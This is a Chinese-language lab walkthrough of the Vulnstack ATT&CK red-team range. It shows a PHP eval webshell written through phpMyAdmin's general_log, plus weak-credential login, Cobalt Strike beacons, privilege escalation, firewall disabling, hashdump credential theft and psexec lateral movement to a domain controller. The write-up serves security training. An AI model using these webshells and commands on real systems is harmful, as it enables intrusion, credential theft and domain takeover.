靶场实战 | ATT&CK实战 Vulnstack 红队(一)

admin 2022年2月22日22:18:49评论54 views字数 2060阅读6分52秒阅读模式

本文来自“白帽子社区知识星球”

作者:Snakin

靶场实战 | ATT&CK实战 Vulnstack 红队(一)


白帽子社区知识星球

加入星球,共同进步

官方描述 :

        红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、 博客三位一体学习。另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭 环。后续也会搭建真实APT实战环境,从实战中成长。关于环境可以模拟出各种各样 实战路线,目前给出作者实战的一套攻击实战路线如下,虚拟机所有统一密码:hongrisec@2019


域环境初始化:

攻击机:kali ip:192.168.111.5靶机:win7 外网ip:192.168.111.6 内网ip:192.168.52.143win03 ip: 192.168.52.141win08 ip: 192.168.52.138

最后,在win7上使用phpstudy开启web服务。


01

信息搜集


nmap扫一下 

nmap -sS 192.168.111.6


-sS :半开放扫描,Nmap发送SYN包到远程主机,但是它不会产生任何会话,目标主 机几乎不会把连接记入系统日志。(防止对方判断为扫描攻击),扫描速度快,效率 高,在工作中使用频率最高。


靶场实战 | ATT&CK实战 Vulnstack 红队(一)


访问80端口,是一个php探针


靶场实战 | ATT&CK实战 Vulnstack 红队(一)


dirsearch扫一下,发现了phpmyadmin


靶场实战 | ATT&CK实战 Vulnstack 红队(一)


访问:


靶场实战 | ATT&CK实战 Vulnstack 红队(一)


通过扫描备份目录可以发现beifen.rar,打开是yxcms的源码,猜测网站搭建了yxcms 网站。访问 /yxcms


靶场实战 | ATT&CK实战 Vulnstack 红队(一)


02

外网渗透


有两种获取shell的方式 

phpMyAdmin 

弱口令 root/root 登录 


phpmyadmin页面getshell方式有两种: 


1. into_outfile写shell 条件:需要secure_file_priv为允

查询:SHOW VARIABLES LIKE "%SECURE%"

靶场实战 | ATT&CK实战 Vulnstack 红队(一)

靶场实战 | ATT&CK实战 Vulnstack 红队(一)

配置未开启,这个方法不行


2. 日志备份获取shell


查询general_log配置

SHOW VARIABLES LIKE "%general%"

发现未开启,开启general log模式

set global general_log='on'

设置日志文 件保存路径

SET global general_log_file='C:/phpStudy/WWW/shell.php'

写入日志文件

SELECT '<?php @eval($_POST[1]);?>'

蚁剑连接


靶场实战 | ATT&CK实战 Vulnstack 红队(一)


Yxcms


靶场实战 | ATT&CK实战 Vulnstack 红队(一)


访问后台,通过修改模板getshell


靶场实战 | ATT&CK实战 Vulnstack 红队(一)


蚁剑连接即可

03

内网信息搜集

CS上线


创建一个监听器

靶场实战 | ATT&CK实战 Vulnstack 红队(一)


制作一个马


靶场实战 | ATT&CK实战 Vulnstack 红队(一)


将exe文件用蚁剑上传并运行


靶场实战 | ATT&CK实战 Vulnstack 红队(一)


上线成功,执行

 sleep 1


信息搜集


shell whoami
godadministrator
shell ipconfig


发现两个网段,一个内网一个外网


192.168.111.6192.168.52.143
shell hostname 查看主机名
stu1


查看当前登录域和用户信息

shell net config Workstation

靶场实战 | ATT&CK实战 Vulnstack 红队(一)


查看域控


shell net group "domain controllers" /domain
这项请求将在域 god.org 的域控制器处理。组名 Domain Controllers注释 域中所有域控制器成员-------------------------------------------------------------------------------OWA$


查看域管


shell net group "domain admins" /domain
这项请求将在域 god.org 的域控制器处理。组名 Domain Admins注释 指定的域管理员成员-------------------------------------------------------------------------------Administrator OWA$


查看域成员

shell net view /domain:god

靶场实战 | ATT&CK实战 Vulnstack 红队(一)


04

提权

使用CS提升当前权限为system


靶场实战 | ATT&CK实战 Vulnstack 红队(一)

靶场实战 | ATT&CK实战 Vulnstack 红队(一)


获得system反弹shell


靶场实战 | ATT&CK实战 Vulnstack 红队(一)


查看防火墙状态

shell netsh firewall show state

发现开启,关闭防火墙

shell netsh advfirewall set allprofiles state off



05

横向移动,获取域控

查看域内计算机

net view

查看域控列表

net dclist

抓取凭证 

hashdump

获取明文

靶场实战 | ATT&CK实战 Vulnstack 红队(一)


SMB Beacon


创建监听


靶场实战 | ATT&CK实战 Vulnstack 红队(一)

使用之前获取的主机信息和凭据,使用psexec模块进行登入。


靶场实战 | ATT&CK实战 Vulnstack 红队(一)

靶场实战 | ATT&CK实战 Vulnstack 红队(一)


拿下OWA域控


靶场实战 | ATT&CK实战 Vulnstack 红队(一)

接下来以同样方式控制最后一台机器,需要把session更改为OWA的


靶场实战 | ATT&CK实战 Vulnstack 红队(一)


参考文章:https://y4tacker.blog.csdn.net/article/details/121764343


如果觉得本文不错的话,欢迎加入知识星球,星球内部设立了多个技术版块,目前涵盖“WEB安全”、“内网渗透”、“CTF技术区”、“漏洞分析”、“工具分享”五大类,还可以与嘉宾大佬们接触,在线答疑、互相探讨。

▼扫码关注白帽子社区公众号&加入知识星球▼


靶场实战 | ATT&CK实战 Vulnstack 红队(一)
靶场实战 | ATT&CK实战 Vulnstack 红队(一)

原文始发于微信公众号(白帽子社区):靶场实战 | ATT&CK实战 Vulnstack 红队(一)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年2月22日22:18:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   靶场实战 | ATT&CK实战 Vulnstack 红队(一)http://cn-sec.com/archives/798084.html

发表评论

匿名网友 填写信息